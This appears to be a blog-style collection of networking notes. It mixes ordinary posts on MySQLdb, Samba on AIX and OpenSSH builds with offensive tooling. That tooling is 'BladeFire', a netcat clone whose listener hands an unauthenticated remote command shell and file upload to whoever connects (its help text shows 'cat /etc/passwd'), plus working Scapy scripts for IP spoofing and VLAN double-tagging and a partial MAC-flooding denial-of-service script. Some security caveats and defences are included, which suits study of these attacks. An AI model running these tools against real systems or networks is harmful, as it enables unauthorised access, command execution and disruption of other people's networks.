BladeFire NC Program

BladeFire Version 0.0.1

#!/usr/bin/env python
#coding:utf-8

import sys
import socket
import getopt
import threading
import subprocess

# define some global variables
# Runtime options.  All of them are filled in by main() from the command
# line; the defaults below are what an unconfigured run sees.
port = 0                  # -p: TCP port to connect to / listen on
target = ""               # -t: host to connect to, or address to bind (empty -> all interfaces)
listen = False            # -l: act as a listener instead of a client
command = False           # -c: offer every peer a command shell
execute = ""              # -e: command run once per accepted connection
upload_destination = ""   # -u: local path that received bytes are written to
upload = False            # declared for compatibility; nothing in this file assigns it

def usage():
    """Print the command-line help and exit with status 0.

    Called by main() when no arguments are given, on ``-h``/``--help``
    and after an option-parsing error.  Never returns (``sys.exit``).
    """
    help_lines = [
        "Blade Fire Tool",
        "",
        "Usage: BladeFire.py -t target_host -p port",
        "-l --listen - listen in [host]:[port] for incoming connections",
        "-e --execute=file_to_run - execute the given file upon receiving a connection",
        "-c --command - initialize a command shell",
        "-u --upload=destination - upon receiving connection upload a file and write to [destination]",
        "",
        "",
        "Examples:",
        "BladeFire.py -t 192.168.0.1 -p 5555 -l -c",
        "BladeFire.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe",
        "BladeFire.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\"",
        "echo 'ABCDEFGHI' | ./BladeFire.py -t 192.168.11.12 -p 135",
    ]
    # One print() of the joined text writes exactly what fourteen
    # single-line print() calls would.
    print("\n".join(help_lines))
    sys.exit(0)

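def client_sender(buffer):
    """Connect to ``target``:``port`` and relay between the terminal and the socket.

    Args:
        buffer: data read from stdin before connecting (main() passes
            ``sys.stdin.read()``); sent first if non-empty.  The original
            signature took no argument although main() calls it with one,
            which raised TypeError on every client run.

    Loops forever: receive a response, print it, read one line from the
    terminal and send it.  Returns only after the connection or the
    terminal raises; the socket is always closed on the way out.

    Python 2 code (``raw_input``, str sockets).  Nothing on the wire is
    encrypted or authenticated -- treat it like plain netcat.
    """
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        client.connect((target, port))
        if len(buffer):
            client.sendall(buffer)

        while True:
            response = ""
            # Read until a recv() returns less than a full chunk.  This is the
            # usual netcat-clone heuristic, not real framing: a reply that is
            # an exact multiple of 4096 bytes makes the next recv() block, and
            # a closed peer (recv() -> "") ends this loop but not the outer one.
            while True:
                data = client.recv(4096)
                response += data
                if len(data) < 4096:
                    break
            print(response)

            buffer = raw_input("")
            buffer += "\n"
            # sendall() retries partial sends; send() may silently send a prefix.
            client.sendall(buffer)
    except (socket.error, EOFError, KeyboardInterrupt):
        # Refused/reset connection, terminal closed, or Ctrl-C.
        print("[*] Exception! Exiting.")
    finally:
        client.close()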

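def server_loop():
    """Bind ``target``:``port`` and hand every accepted connection to client_handler.

    An empty ``target`` becomes ``0.0.0.0``, i.e. the listener is reachable
    on every interface.  client_handler offers file writes, command
    execution and a shell to whoever connects, with no authentication, so
    bind a specific address with ``-t`` and keep this on a lab network or
    behind a firewall.

    Runs forever; only an exception (e.g. a failed bind) or a signal ends
    it, and the listening socket is closed on the way out.
    """
    global target

    if not len(target):
        target = "0.0.0.0"

    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Without SO_REUSEADDR a restart right after a crash fails with
    # EADDRINUSE while the old connections sit in TIME_WAIT.
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((target, port))
    server.listen(5)

    try:
        while True:
            client_socket, addr = server.accept()
            client_thread = threading.Thread(target=client_handler, args=(client_socket,))
            client_thread.start()
    finally:
        server.close()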

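def run_command(command):
    """Run ``command`` through the system shell and return combined stdout+stderr.

    Trailing whitespace (including the newline the shell loop leaves on the
    buffer) is stripped first.  A command that exits non-zero or a shell
    that cannot be spawned yields the literal string
    ``"Failed to execute command.\\r\\n"`` instead of an exception.

    SECURITY: ``shell=True`` on a string that arrives straight off the
    network is deliberate -- this *is* the remote-shell feature -- but it
    means every connecting peer gets arbitrary command execution as the
    user running the listener.  There is no allow-list and no
    authentication anywhere in this tool.
    """
    command = command.rstrip()
    try:
        output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
    except (subprocess.CalledProcessError, OSError):
        # Non-zero exit status, or the shell itself could not be started.
        output = "Failed to execute command.\r\n"

    return output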


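def client_handler(client_socket):
    """Serve one accepted connection according to the global options, in order.

    1. ``upload_destination`` set: read until the peer closes its sending
       side, write everything to that local path, report success/failure.
    2. ``execute`` set: run it with run_command() and send the output.
    3. ``command`` true: loop offering a ``<MBP:#> `` prompt; each
       newline-terminated line is run with run_command() and its output
       sent back.  Ends when the peer disconnects (the original spun
       forever here because recv() keeps returning "" on a closed socket).

    The socket is closed whenever the handler finishes or the peer goes away.

    SECURITY: no step authenticates the peer.  Anyone who can reach the
    port can overwrite ``upload_destination`` with arbitrary bytes and run
    arbitrary shell commands as this process's user.  Lab use only.
    """
    global execute
    global command

    try:
        if len(upload_destination):
            chunks = []
            while True:
                data = client_socket.recv(1024)
                if not data:
                    break
                chunks.append(data)

            # The path is chosen by the operator on the command line; the
            # content is whatever the remote peer sent, written verbatim.
            try:
                with open(upload_destination, "wb") as file_descriptor:
                    file_descriptor.write("".join(chunks))
                client_socket.sendall("Successfully saved file to %s\r\n" % upload_destination)
            except (IOError, OSError):
                client_socket.sendall("Failed to save file to %s\r\n" % upload_destination)

        if len(execute):
            output = run_command(execute)
            client_socket.sendall(output)

        if command:
            while True:
                client_socket.sendall("<MBP:#> ")
                cmd_buffer = ""
                while "\n" not in cmd_buffer:
                    data = client_socket.recv(1024)
                    if not data:
                        # Peer disconnected; stop instead of busy-looping.
                        return
                    cmd_buffer += data
                response = run_command(cmd_buffer)
                client_socket.sendall(response)
    except socket.error:
        # Peer reset, or a send on a dead connection: nobody left to tell.
        pass
    finally:
        client_socket.close()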



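def main():
    """Parse the command line, then run as a client or as a listener.

    Client mode (no ``-l``): needs ``-t`` and ``-p``; stdin is read to EOF
    and handed to client_sender() as the first payload.
    Listener mode (``-l``): server_loop() binds ``-t`` (default: all
    interfaces) on ``-p`` and serves ``-e``/``-u``/``-c`` to every peer
    without authentication.

    Exits via usage() on no arguments, ``-h``, an unknown option or a
    non-numeric port.
    """
    global listen
    global port
    global execute
    global command
    global upload_destination
    global target

    if not len(sys.argv[1:]):
        usage()

    # Long options that take a value need the trailing "=" for getopt;
    # without it "--execute=foo" was rejected as "must not have an argument".
    # "--command" is what the help text advertises; "--commandshell" is kept
    # because the option loop historically matched it.
    try:
        opts, _ = getopt.getopt(
            sys.argv[1:],
            "hle:t:p:cu:",
            ["help", "listen", "execute=", "target=", "port=", "command", "commandshell", "upload="],
        )
    except getopt.GetoptError as err:
        print(str(err))
        usage()

    for o, a in opts:
        if o in ("-h", "--help"):
            usage()
        elif o in ("-l", "--listen"):
            listen = True
        elif o in ("-e", "--execute"):
            execute = a
        elif o in ("-c", "--command", "--commandshell"):
            command = True
        elif o in ("-u", "--upload"):
            upload_destination = a
        elif o in ("-t", "--target"):
            target = a
        elif o in ("-p", "--port"):
            try:
                port = int(a)
            except ValueError:
                print("Invalid port: %s" % a)
                usage()
        else:
            # getopt already rejects unknown options, so this is unreachable
            # in practice; report instead of relying on an assert that "-O" strips.
            print("Unhandled option: %s" % o)
            usage()

    if not listen and len(target) and port > 0:
        buffer = sys.stdin.read()
        client_sender(buffer)
    if listen:
        server_loop()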


# Script entry point; importing the module only defines the functions.
if __name__ == "__main__":
    main()

import Mysqldb error

Cannot import MySQLdb

The error looks like this:
└─(14:11:27)──> python -c "import MySQLdb" ──(一, 725)─┘
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/MySQLdb/__init__.py", line 19, in <module>
import _mysql
ImportError: dlopen(/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/_mysql.so, 2): Library not loaded: libmysqlclient.18.dylib
Referenced from: /Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/_mysql.so
Reason: image not found

How to fix it:

Add the following line to your shell profile (`.bash_profile`; in my case `.zshrc`):

export DYLD_LIBRARY_PATH=/usr/local/mysql-5.6.27-osx10.8-x86_64/lib:$DYLD_LIBRARY_PATH

`/usr/local/mysql-5.6.27-osx10.8-x86_64/lib` is where MySQL lives on my OS X machine; substitute your own path and `import MySQLdb` will succeed.

Caveat: `DYLD_LIBRARY_PATH` set in a shell profile is injected into every process started from that shell, not just Python, and it is a classic library-hijacking vector if anyone else can write to that directory. A narrower fix is to repair the extension's own reference to `libmysqlclient.18.dylib` (`install_name_tool -change` on `_mysql.so`) or to symlink that one library into `/usr/local/lib`, and in either case keep the directory root-owned.

SocketProgram

import socket

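def print_machine_info():
    """Print this host's name and the IPv4 address that name resolves to.

    ``gethostbyname(gethostname())`` asks the resolver (hosts file / DNS)
    for the machine's own name, so on a box whose hostname is not
    resolvable it raises ``socket.gaierror`` (a ``socket.error`` subclass).
    It reports a single IPv4 address, not necessarily the one used for
    outbound traffic on a multi-homed host.

    The original used Python-2-only ``print`` statements; ``print()`` with
    one argument produces the same output on Python 2 and 3.
    """
    host_name = socket.gethostname()
    ip_address = socket.gethostbyname(host_name)
    print("Host name: %s" % host_name)
    print("IP address: %s" % ip_address)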

# Only run when executed as a script, not when imported.
if __name__ == "__main__":
    print_machine_info()

Running this script, we get the machine's basic network identity: its host name and the IPv4 address that name resolves to.

import socket

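def get_remote_machine_info(remote_host='www.fuckbaidu.com'):
    """Resolve ``remote_host`` and print its IPv4 address.

    Args:
        remote_host: hostname to resolve (a dotted-quad is returned as-is
            without a lookup).  Defaults to the host the original hard-coded.

    A failed lookup (``socket.gaierror``, a ``socket.error`` subclass) is
    caught and printed as ``"<host>: <error>"`` rather than raised.
    The answer comes from an ordinary, unauthenticated DNS query.

    The original used Python-2-only syntax (``print x`` and
    ``except E, name``); this form runs on Python 2 and 3.
    """
    try:
        print("IP address: %s" % socket.gethostbyname(remote_host))
    except socket.error as err_msg:
        print("%s: %s" % (remote_host, err_msg))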

# Only run when executed as a script, not when imported.
if __name__ == "__main__":
    get_remote_machine_info()

The Python socket library has utilities for the various IP address formats. Here we use two of them: inet_aton(), which packs a dotted-quad string into its 4-byte network-order form, and inet_ntoa(), which takes that packed form (not the dotted string) and turns it back into text.

import socket
from binascii import hexlify

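def convert_ip4_address(addresses=('127.0.0.1', '192.168.1.1')):
    """Pack each IPv4 address with inet_aton() and unpack it again with inet_ntoa().

    For every address prints
    ``IP address: <a> => Packed:<hex>, Unpacked:<a>`` where ``<hex>`` is
    the 4-byte network-order form as lowercase hex digits.

    Args:
        addresses: iterable of dotted-quad strings; defaults to the two
            original examples.  ``inet_aton`` raises ``socket.error``
            (``OSError`` on Python 3) for anything it cannot parse.

    Fixes the original, which called the non-existent ``socket.inet.ntoa``
    on the dotted string instead of ``socket.inet_ntoa`` on the packed bytes,
    and used a Python-2-only ``print`` statement.
    """
    for ip_addr in addresses:
        packed_ip_addr = socket.inet_aton(ip_addr)
        unpacked_ip_addr = socket.inet_ntoa(packed_ip_addr)
        # hexlify() returns bytes on Python 3; decode so "%s" never shows b'...'.
        packed_hex = hexlify(packed_ip_addr).decode("ascii")
        print("IP address: %s => Packed:%s, Unpacked:%s" % (ip_addr, packed_hex, unpacked_ip_addr))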

# Only run when executed as a script, not when imported.
if __name__ == "__main__":
    convert_ip4_address()

Samba AIX solutions

SAMBA:

——————————————————————————–


SAMBA CLIENT ALL:

install SAMBA:

bos.cifs_fs.5.3.0.0.I
bos.cifs_fs.rte.5.3.0.62.U

bos.cifs_fs.smit.5.3.0.60.bff

smitty cifs_fs

lscifsmnt
rmcifsmnt -f /smb_mnt
mkcifsmnt -f /mnt -d share1 -h server1 -c user1


smitty cifs_fs:
The first mount will be read-only; afterwards you have to come back and set it again.
If the share name is given as \\server\share, it is enough to enter "share" (the \\server part is not needed).

[Entry Fields]
  • Pathname of mount point /homes/ftp/Test
    SERVER name [10.10.40.10]
    User Name [SSH01]
    Password []
    Share name [Test] <–what has been shared on the other system
    Mount as a READ-ONLY system [no] <–first it will be read-only, come back again +
    uid [6027083]
    gid [6000116]
    Mode [777]
    Domain to Authenticate against [] <–once on windows I had to set here: ads
    Remount now, add change to /etc/filesystems, [Both]
    or both
    
    /etc/filesystems entry will mount on start [no]
    Mount Type name []

After these the credential file has to be set as well:
smitty cifs_fs -> Credential configuration

/etc/cifs_fs/cifscred file allows future mounting of CIFS shares with stored credentials
lscifscred lists the server or user entries stored in the /etc/cifs_fs/cifscred file (mkcifscred, rmcifscred, chcifscred)


Other methods (non-interactive):
/usr/sbin/mkcifsmnt -t rw -f /homes/ftp/29/test -d test -h 10.10.15.24 -c SSG01 -p xyz -u 32292 -g 6000116 -x 777
mount -v cifs -n 10.10.15.24/SSG01/xyz -o uid=32292,gid=200,fmode=775 test /homes/ftp/29/test

Caveat: a password given with -p / -n on the command line shows up in `ps` output and in the shell history, readable by other users on the box. Prefer the /etc/cifs_fs/cifscred credential store (mkcifscred, see above) and leave the password off the command line. A mode of 777 also makes the mounted share world-writable locally; tighten -x / fmode to what the share really needs.


Once, on the Windows side, something had to be changed for it to work:
"I have changed something on the server - from 'Send NTLMv2 response only. Refuse LM & NTLM' to 'Send LM & NTLM - use NTLMv2 session security if negotiated'. So I hope this fixes the problem."

Caveat: this lowers the server's LAN Manager authentication level for every client that talks to it, re-enabling LM/NTLMv1 responses that are cheap to crack offline and usable in relay attacks. Treat it as a workaround for an old CIFS client, scope it to that host if the environment allows, and revert it once the client can negotiate NTLMv2.

——————————————————————————–


——————————————————————————–


SAMBA SERVER ALL:

Needed ports:

netbios-ns 137/tcp # NETBIOS Name Service
netbios-ns 137/udp # NETBIOS Name Service
netbios-dgm 138/tcp # NETBIOS Datagram Service
netbios-dgm 138/udp # NETBIOS Datagram Service
netbios-ssn 139/tcp # NETBIOS Session Service
netbios-ssn 139/udp # NETBIOS Session Service

microsoft-ds 445/tcp # Microsoft-DS
microsoft-ds 445/udp # Microsoft-DS

NetBIOS (137-139) is the legacy name/datagram/session layer used by Windows file & printer sharing.

Microsoft-DS (port 445) carries SMB directly over TCP/IP without the NetBIOS session layer; it was introduced with Windows 2000. SMB stands for Server Message Block; Samba is the free Unix implementation of that protocol, not another name for it. Note the Samba list below only uses 445/tcp — the 445/udp entry above is just the /etc/services line.

In www.samba.org, written this:
UDP/137 - used by nmbd
UDP/138 - used by nmbd
TCP/139 - used by smbd
TCP/445 - used by smbd

INSTALL: (note: Samba 3.0.4 dates from 2004 and has many published vulnerabilities since; these notes record the procedure, but anything beyond a lab should run a currently supported release)

/mnt/MISC/SAMBA
-rwxrwxrwx 1 root sys 67379200 Jun 28 2005 samba-3.0.4.0.bff

smitty install:
root@aix31: /mnt/MISC/SAMBA # lslpp -l | grep -i samba
freeware.samba.rte 3.0.4.0 COMMITTED Samba Version 3.0.4


SWAT (Samba Web Administration Tool) configuration: (not necessary, only if you want it)
It is a web GUI for Samba; a web browser is needed for SWAT, and X11 as well.
Caveat: SWAT runs as root out of inetd and takes the root password over plain HTTP on port 901, so reach it only via localhost (as in the URL below) or an SSH tunnel, and never expose 901 on the network.

/etc/services:
swat 901/tcp

/etc/inetd.conf:
swat stream tcp nowait root /usr/local/samba/sbin/swat swat

in browser:

http://localhost:901

SAMBA tools:

install dir: /usr/local/samba

/usr/local/samba/sbin/nmbd <–provides netbios nameserver supports to clients (nameserver for samba)
/usr/local/samba/sbin/smbd <–smb daemon
/usr/local/samba/sbin/smbd -b <–shows configuration infos. i.e.: path for the config file: smbd -b|grep smb.conf
/usr/local/samba/bin/smbstatus <–shows actual sharings and connections
/usr/local/samba/bin/testparm <–test the smb.conf file for any typo
/usr/local/samba/bin/pdbedit -a user123 <–creates users (on AIX I created before)
/usr/local/samba/bin/smbpasswd <–changes pw (-a: add a user who can access the shares from a client)
/usr/local/samba/bin/smbclient <–it is an SMB client program for UNIX machines, it provides an ftp like interface,

to transfer files between a windows 'server' and a unix 'client'

PROCESS OF SAMBA CONFIGURATION:

  1. check ports 137, 138, 139 and 445 (open them on the firewall if needed — and only towards the clients that need the share)
    rpcinfo, telnet

  2. check where is smb.conf:
    /usr/local/samba/sbin/smbd -b <–shows version of SAMBA etc.,and the path to smb.conf

  3. edit smb.conf:
    /usr/local/samba/lib/smb.conf (it is a link to /etc/samba/smb.conf)

Create a similar entry:

[samba_share] <–use this name for connection
comment = share test <–anything can be written here
path = /home/samba_share <–path of the dir what we want to share
read only = no
guest ok = yes
read list = user123 <–users who will be able to read it (space separated)
write list = user123 <–users who will be able to write to it (space separated)

Important:
-check the owner and permissions of the shared directory (the path)
-after changing the conf file the daemons have to be restarted for the changes to take effect
-"guest ok = yes" combined with "read only = no" lets anyone who can reach the port write to the share without a password; leave guest ok out unless anonymous access is really intended


this is good for read-only (note "read only = yes" — the earlier listing had "no", which makes the share writable):
[samba_share]
comment = share test
path = /home/samba_share
read only = yes

guest ok = yes

3.SAMBA user creation:
/usr/local/samba/bin/smbpasswd -a user123 <– -a: add user as well

Same user has to be created, to what we gave in the conf file

For root we can create one as well:
/usr/local/samba/bin/smbpasswd -a root
(root's password is needed — but think twice: this exposes the root account to password guessing over SMB on 139/445; a dedicated unprivileged share user is the safer choice)

  1. testing smb.conf:
    /usr/local/samba/bin/testparm <–test the smb.conf file for any typo (default conf file)

testing not the default conf file:
/usr/local/samba/bin/testparm /etc/samba/smb.conf

  1. starting daemons:
    /usr/local/samba/sbin/smbd -D <– -D: handling it as daemon (this is the default)
    /usr/local/samba/sbin/nmbd -D

  2. connecting to SAMBA:

LOCALLY (AIX):
/usr/local/samba/bin/smbclient //localhost/samba_share <–samba_share: which has been created in conf file

password is what has been created with smbpasswd for the user
if not root user, than check permissions of the conf file (if needed give read permission)

another way: /usr/local/samba/bin/smbclient -U% -L localhost

REMOTELY (WINDOWS):
(tools->map network drive->choose a drive)
the command: \10.10.101.78\samba_share <–it will map that directory

“Connect using a different username”: If on Windows and AIX users are identical this is not needed.
If user/pw created in SAMBA is different of the actual windows user/pw, then here we can give the SAMBA user/pw.

  1. Checks, tests:
    /usr/local/samba/bin/smbstatus <–shows connections (if we could connect)

/usr/local/samba/bin/smbclient -L 10.10.101.78 <–shows which shares are available on a given host

!!! Two different Samba versions (the rpm one and the fileset one) should not be installed at the same time (the daemons did not start for me) !!!

——————————————————————————–


I had this error:
(Samba was installed from rpm and it was started from inetd.)

smbclient -L localhost -U

added interface ip=10.10.10.8 bcast=10.10.35.31 nmask=255.255.255.224
session request to LOCALHOST failed (Call returned zero bytes (EOF)
)
session request to *SMBSERVER failed (Call returned zero bytes (EOF)
)

  1. check samba logs (I turned this on)
    vi /etc/inetd.conf: netbios-ssn stream tcp nowait root /usr/sbin/smbd -l /var/log/samba.log smbd
    refresh -s inetd
    (probably in syslog you can find where it is logging)

  2. cat samba.log

    [2012/10/11 09:20:11, 0] tdb/tdbutil.c:tdb_log(531)
    tdb(/etc/secrets.tdb): rec_free_read bad magic 0x2f73616d at offset=812 <–shows problems with /etc/secrets.tdb
    [2012/10/11 09:20:11, 0] passdb/machine_sid.c:pdb_generate_sam_sid(163)
    pdb_generate_sam_sid: Failed to store generated machine SID.
    [2012/10/11 09:20:11, 0] smbd/server.c:main(793)
    ERROR: Samba cannot create a SAM SID.

  3. stop samba
    vi /etc/inetd.conf -> comment lines smbd, nmbd
    refresh -s inetd

  4. move /etc/secrets.tdb aside (it holds the machine SID and other stored secrets, so keep the .old copy until the rebuilt server is verified)
    mv /etc/secrets.tdb /etc/secrets.tdb.old

  5. start samba
    vi /etc/inetd.conf -> uncomment smbd, nmbd lines
    refresh -s inetd

  6. test login

    smbclient -L localhost -U

    added interface ip=10.10.10.8 bcast=10.10.35.31 nmask=255.255.255.224
    Password:


I had this “error”:

smbstatus

Samba version 2.2.7

Service uid gid pid machine

Failed to open byte range locking database
ERROR: Failed to initialise locking database
Can’t initialise locking module - exiting

This is not an error after first successful login it will be OK.
I did: smbclient -L localhost -U
After that: smbstatus

Samba version 2.2.7

Service uid gid pid machine

No locked files


IBM AIX 6 install Openssh 7.2p2

我先安装了zlib

zlib 安装的版本是1.2.8,源代码可以从zlib的官网上下载
Zlib
基本的步骤都是解包,然后./configure make && make install

安装Openssh7.2p2

这个步骤稍微复杂,我遇到一个错误,找到问题修改了源代码中几个地方
从openssh包中找到一个叫做sshbuf-getput-basic.c 的C文件
用VI编辑器打开,把代码中所有的 va_copy 替换成 VA_COPY,可以用vi的替换命令批量完成:
:%s/va_copy/VA_COPY/g (末尾的 g 保证同一行出现多次时全部替换)。完成之后在代码的宏定义下面加入
下面的条件语句.

/*
 * Portable va_list copy for OpenSSH's sshbuf-getput-basic.c on AIX.
 * Prefer C99 va_copy, then the GNU __va_copy, and only as a last resort
 * plain assignment.  The assignment fallback is only correct where
 * va_list is a scalar/pointer type; presumably that is the case for the
 * AIX toolchain this note was written against (TODO confirm for yours).
 */
#ifndef VA_COPY
# ifdef HAVE_VA_COPY
#  define VA_COPY(dest, src) va_copy(dest, src)
# else
#  ifdef HAVE___VA_COPY
#   define VA_COPY(dest, src) __va_copy(dest, src)
#  else
#   define VA_COPY(dest, src) (dest) = (src)
#  endif
# endif
#endif

全部修改完毕后,进行./configure,然后没有报错就可以进项make && make install

说明

我这边的openssl没有升级,因为之前安装过openssh,所以一些依赖关系已经存在;
C编译器在我这边的AIX6里面已经安装,如果没有gcc需要额外安装gcc编译器。
注意:不升级openssl意味着新的sshd仍然链接旧的openssl库,旧库里的漏洞不会因为升级openssh而消失;
另外7.2p2本身也已经是2016年的版本,生产环境应使用当前仍在维护的版本。

Hope u enjoy!

Update Openssh 7.2p2 on Redhat 5

首先先检查依赖环境

pam-devel openssl-devel zlib-devel krb5-devel

Zlib 1.1.4 or 1.2.1.2 or greater

卸载之前安装的openssl(注意:用 --nodeps 强制删除系统openssl会让所有依赖它的程序——yum、curl、现有的sshd等——在新版本装好之前无法运行,务必保留一个已登录的root会话并备份/etc/ssh;更稳妥的做法是不删除系统包,把新的openssl装到/usr/local或/opt下,再用openssh的 --with-ssl-dir 让它链接新库)

rpm -e `rpm -qa | grep openssl` --allmatches --nodeps

解压我给你们的两个包

tar -xzvf [Packege name]

编译安装OpenSSl

注意参数
注意使用root权限
(1)./config --prefix=/usr --shared
注意,一定要加上--shared选项,否则openssh编译时候会找不到openssl的library。
--prefix=/usr 会覆盖系统自带的openssl文件,之后yum不再为它提供安全更新,需要自己跟踪openssl的漏洞公告并及时重新编译。
这一步我这边出现了一个make depend的报警,忽略即可

(2)安装
make && make install
(3)验证安装是否成功
openssl version -a

编译安装Openssh

1)配置
./configure --prefix=/usr --with-pam
--with-zlib --with-md5-passwords
2)安装
make && make install
(3)检查OpenSSH
ssh -V

注意点:安装后的配置文件在/usr/etc/sshd_config
安装完ssh之后主机密钥(host key)会重新生成,所以其他机器known_hosts里保存的旧指纹会不匹配并报警。
正确的做法是把/etc/ssh下原有的ssh_host_*_key复制到新的配置目录继续使用,或者把新指纹通过带外方式告知客户端后再删除旧条目——
不要养成一看到警告就删known_hosts的习惯,那正是中间人攻击想要的。
生成密钥的命令:ssh-keygen -t rsa(这是用户密钥;主机密钥可以用 ssh-keygen -A 一次生成)

IP spoofing

#!/usr/bin/env python
#coding:utf-8

'''
IP-Spoofing is the forgery of IP addresses. The source address is not
the IP of the real network device the packet was sent over, but manually
inserted one. Attackers use this technique either to hide the source of
the attack or to circumvent a packet-filter or other security layers like
tcp wrapper that block or accept connections depending on their source ip
address.
'''

import sys
from scapy.all import send, IP, ICMP

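if len(sys.argv) < 3:
    print(sys.argv[0] + " <src_ip> <dst_ip>")
    sys.exit(1)

# Forge an ICMP echo request whose IP source is whatever the caller asked for.
# Raw sockets are needed, so this must run as root.  Only use it against
# hosts and networks you are authorised to test; forged source addresses are
# exactly what BCP 38 / egress filtering exists to drop, and many networks do.
packet = IP(src=sys.argv[1], dst=sys.argv[2]) / ICMP()

# The original called send(), which returns None, so its `if answer:` branch
# could never run.  sr1() sends and waits for the first matching reply.  The
# reply is addressed to the *spoofed* source, so it is only visible here when
# that address is ours or the reply otherwise crosses our segment; the timeout
# keeps the script from hanging when it does not.
from scapy.all import sr1
answer = sr1(packet, timeout=2, verbose=0)

if answer:
    answer.show()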

'''
Source Code Note:
We create an IP packet that is included into an ICMP packet by defining
IP() / ICMP(). This somewaht unusual but handy declaration syntax is made
possible by Scapy by overriding the / operator with the help of the __div__
method.
The IP packet gets the source and destination IP as a parameter. The resulting pa
cket object is dumped on the screen by calling the show() method on it
(show2() would only display layer 2). Afterwards we send it by calling send()
(here too we could use sendp() for layer2). Last but not least if we get any
response packets it is being printed on the screen. Of course we can only
receive a reply if it is sent to our network card. Therefore it could be necessary
to implement a Mitm attack if our host is not connected to the same hub as the target
system. In our case we do not have to care about a Mitm attack,because Scapy inserts
our MAC address as source address and the destination MAC of the destination IP
automatically. Thus we can be sure the reply packet is directly sent back to us.
You can protect against IP spoofing by authenticating (and optionally encrypting) IP packets, for example with the AH or ESP protocols of the IPsec family. On the network side, routers should drop packets with source addresses that cannot legitimately come from that interface (ingress/egress filtering, BCP 38); that is what keeps packets like the one above from leaving most well-run networks at all.

'''

探测网站信息

Identifying the technology used by a website

We need to install builtwith first (pip install builtwith).

# builtwith.parse() fetches the page itself -- an HTTP request leaves this
# machine for the target -- and then fingerprints what it downloaded.
import builtwith
builtwith.parse('http://example.webscrapying.com')

we can get the following information:

{u’javascript-frameworks’: [u’jQuery’, u’Modernizr’, u’jQuery UI’],
u’web-frameworks’: [u’Web2py’, u’Twitter Bootstrap’],
u’programming-languages’: [u’Python’], u’web-servers’: [u’Nginx’]}

This module takes a URL, downloads the page and analyzes it, then returns the technologies the website appears to use. Because it fetches the page itself, the request shows up in the target's logs like any other visitor, and the result is a heuristic fingerprint, not a guarantee.

Finding the owner of a website

You need to install the module named python-whois

pip install python-whois

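import whois

# whois.whois() performs a live WHOIS query (network I/O) for the domain and
# returns a dict-like record; print() with one argument works on Python 2
# and 3, where the original's bare `print` statement is Python-2-only.
# Registrant data is whatever the registrar publishes, so it may be
# redacted or proxied and should be treated as unverified.
print(whois.whois('weibo.com'))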

print whois.whois(‘weibo.com’)

print whois.whois(‘weibo.com’)
{
“updated_date”: [
“2016-03-20 00:00:00”,
“2016-03-20 14:56:29”
],
“status”: [
“clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited“,
“clientTransferProhibited https://icann.org/epp#clientTransferProhibited“,
“clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
],
“name”: “Beijing Weibo Internet Technology Co.,Ltd”,
“dnssec”: “unsigned”,
“city”: “Bei jing”,
“expiration_date”: [
“2026-03-20 00:00:00”,
“2111-03-20 04:00:00”
],
“zipcode”: “100080”,
“domain_name”: [
“WEIBO.COM”,
“weibo.com”
],
“country”: “CN”,
“whois_server”: “whois.35.com”,
“state”: “Bei jing”,
“registrar”: “35 Technology Co., Ltd.”,
“referral_url”: “http://www.35.com“,
“address”: “Ideal Int’l Plaza, No. 58, West Of North Forth Ring Rd”,
“name_servers”: [
“NS1.SINA.COM.CN”,
“NS2.SINA.COM.CN”,
“NS3.SINA.COM”,
“NS3.SINA.COM.CN”,
“NS4.SINA.COM”,
“NS4.SINA.COM.CN”,
“ns1.sina.com.cn”,
“ns2.sina.com.cn”,
“ns3.sina.com.cn”,
“ns4.sina.com.cn”,
“ns3.sina.com”,
“ns4.sina.com”
],
“org”: “Beijing Weibo Internet Technology Co., Ltd.”,
“creation_date”: [
“1999-03-20 00:00:00”,
“1999-03-20 04:00:00”
],
“emails”: [
“abuse@35.cn”,
“domainname@staff.sina.com.cn”
]
}

VLAN hopping

#!/usr/bin/env python
#coding:utf-8
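'''
Lets say our computer is connected to VLAN 1 and
wants to ping another one on VLAN 2.
'''

from scapy.all import *

# Double-tagged (802.1Q-in-802.1Q) frame: the outer tag carries our own VLAN,
# the inner one the victim's.  The switch strips the outer tag and forwards on
# the inner one, so this typically only works one-way and only when our access
# port sits in the trunk's native VLAN.  Lab / authorised networks only.
#
# Fixes two errors in the original listing: the module docstring used '' (an
# empty string) instead of ''', and the IP() call was missing its closing
# parenthesis, so ICMP() was being divided into the dst string.
packet = (
    Ether(dst="c0:d3:de:ad:be:ef")
    / Dot1Q(vlan=1)
    / Dot1Q(vlan=2)
    / IP(dst="192.168.13.3")
    / ICMP()
)

sendp(packet)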

'''information

First we put the header including our own VLAN tag into the packet, and after it
the one of the destination host. The switch removes the first tag, then decides
how to react to the packet; seeing the second tag with VLAN id 2, it forwards it
to that VLAN. This double-tagging only works when our access port is in the trunk's
native VLAN, and it is one-way (the reply is not double-tagged back to us). On some
switches the attack will only succeed if they are connected to other VLAN-enabled
switches via trunks/stacking, because otherwise they use port-based VLANs. Mitigation:
keep user ports out of the native VLAN and tag the native VLAN on trunks.
'''

MAC-Flooder

brief

Switches, like other computers, have a limited amount of memory; that is also true for the table
holding the MAC address information the switch uses to remember which MAC is on which port,
as well as for its internal ARP cache. Some switches react a bit weirdly when these buffers
overflow. This can range from denial of service up to giving up switching and behaving like
a normal hub. In hub mode the overall rise in traffic is not the only problem: all connected
computers can then see the complete traffic without any further action.
You should test how your switches react to this — on an isolated lab segment and with permission,
since it is a denial-of-service attack — and that is what the next script is good for. It generates
random MAC addresses and sends them to your switch until the table is full. The defence is port
security / a per-port MAC limit, which makes the switch shut the port instead of failing open.

#!/usr/bin/env python
#coding:utf-8

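import sys
from scapy.all import *

# One frame template with random source *and* destination MACs and random
# IPs; scapy re-draws its Rand* volatile fields each time the frame is built,
# so every iteration of the loop below carries a different address pair.
# Each new source MAC costs the switch a forwarding-table entry, which is
# the whole point of the exercise.
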